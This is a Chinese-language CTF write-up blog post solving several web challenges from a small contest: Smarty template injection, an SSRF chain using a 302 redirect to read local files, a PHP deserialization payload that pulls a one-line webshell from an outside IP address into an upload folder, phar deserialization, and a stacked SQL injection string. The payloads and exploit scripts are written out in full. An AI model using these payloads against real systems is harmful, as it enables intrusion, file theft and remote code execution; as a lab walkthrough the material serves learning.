寒假没怎么打CTF,后面的AntCTF、D^3CTF刚好在开学的时间段,四叶草安全举办的小比赛,都是简单题,随便看看
GET
smarty模板注入
可以使用{if phpinfo()}{/if}
执行任意php代码
用header绕一下flag
关键字就行
1
2
3
|
?flag={if%20show_source(array_rand(array_flip(getallheaders())))}{/if}
header:
0: flag.php
|
Website
给了一个提交url页面,测试发现是后端访问,猜测是php的curl
测试发现,只能以http或者https协议开头,尝试302重定向绕过
1
2
3
4
|
<?php
header("Location: file:///etc/passwd");
exit;
?>
|
读到/etc/passwd
尝试直接读flag,但是并没有什么发现
通过/proc/self/cwd/index.php
读到了源码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
<?php
error_reporting(0);
function check_302($url)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 302 redirect
curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return $info['url'];
}
if (isset($_GET['url'])) {
$url = $_GET['url'];
if (strpos($url, 'http://127.0.0.1/') === 0 || strpos($url, 'http://localhost/') === 0) {
exit("<script>alert('Cloversec WAF!')</script>");
}
if (!preg_match('/^(http|https):\/\/[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*/i', $url)) {
exit("<script>alert('Cloversec WAF!')</script>");
}
$url = check_302($url);
echo $url;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
echo "<div class='yulan'><head> <base href='" . $url . "/'> </head><!-- 以下是正文 --><br>" . $result . "</div>";
} else {
echo "<div class='yulan'><h2>Hello</h2></div>";
}
?>
|
然后根据响应看到是Server: Apache/2.2.15
,该版本的配置文件路径为:/etc/httpd/conf/httpd.conf
读到了:
1
2
3
4
5
6
7
|
<VirtualHost _default_:80>
DocumentRoot /var/www/html/web1
</VirtualHost>
<VirtualHost *:8080>
DocumentRoot /var/www/html/web2
</VirtualHost>
|
读web2源码:
/var/www/html/web2/index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
<?php
class copy_file{
public $path = 'upload/';
public $file;
public $url;
function __destruct(){
if(strpos($this -> url,'http://127.0.0.1') === 0){
file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));
echo $this -> path.$this -> file." update successed!)<br>";
}else{
echo "Hello CTFer";
}
}
}
if(isset($_GET['data'])){
$data = $_GET['data'];
unserialize($data);
}else{
echo "<h2>Welcome to CloverSec WebSite<h2>";
}
?>
|
简单构造一下,写个shell:
这里试了直接web1路径,但是没权限,只有web2的upload
目录可写
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
<?php
class copy_file{
public $path = 'upload/';
public $file;
public $url;
function __destruct(){
var_dump(strpos($this -> url,'http://127.0.0.1') === 0);
if(strpos($this -> url,'http://127.0.0.1') === 0){
file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));
echo $this -> path.$this -> file." update successed!)<br>";
}else{
echo "Hello CTFer";
}
}
}
$a = new copy_file();
$a->file = 'a.php';
$a->url = 'http://127.0.0.1@47.102.210.191:8000/a.txt';
echo urlencode(serialize($a));
?>
|
用@
绕一下开头,a.txt内容为get的一句话,方便使用
1
2
3
4
|
<?php
header("Location: http://127.0.0.1:8080/?data=O%3A9%3A%22copy_file%22%3A3%3A%7Bs%3A4%3A%22path%22%3Bs%3A7%3A%22upload%2F%22%3Bs%3A4%3A%22file%22%3Bs%3A5%3A%22a.php%22%3Bs%3A3%3A%22url%22%3Bs%3A42%3A%22http%3A%2F%2F127.0.0.1%4047.102.210.191%3A8000%2Fa.txt%22%3B%7D");
exit;
?>
|
shell弹不出来,看到web2路径才发现flag_WebSite_SsRf.txt
直接访问:http://4b7c0f6a.yunyansec.com/index.php?url=http://127.0.0.1:8080/flag_WebSite_SsRf.txt
flag{d195eeb026cadd7d00e79d112b102f00}
filemange
code.html给了源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
<?php
$path = "./sandbox/";
class game
{
public $file_name;
public $content = "Hello World";
public function __construct($file_name)
{
$this->file_name = $file_name;
}
public function __wakeup()
{
if (strpos($this->content, "php")) {
die("Hacker...");
}
}
public function __destruct()
{
$this->test();
}
public function test()
{
$filename = "/var/www/html/" . $this->file_name;
file_put_contents($filename, $this->content);
echo $this->file_name . " create Successful!!!";
}
}
if ($method == "unlink") {
if (!isset($_POST['file'])) {
echo 'unlink html form';
} else {
$file = $_POST['file'];
if (!unlink($file)) {
echo "删除失败";
} else {
echo "删除成功";
}
}
}
?>
|
很明显phar反序列化,构造一下生成phar文件改后缀上传即可
StAck3d 1nj3c
与[SUCTF 2019]EasySQL
类似
1
|
1;set sql_mode=PIPES_AS_CONCAT;select 1
|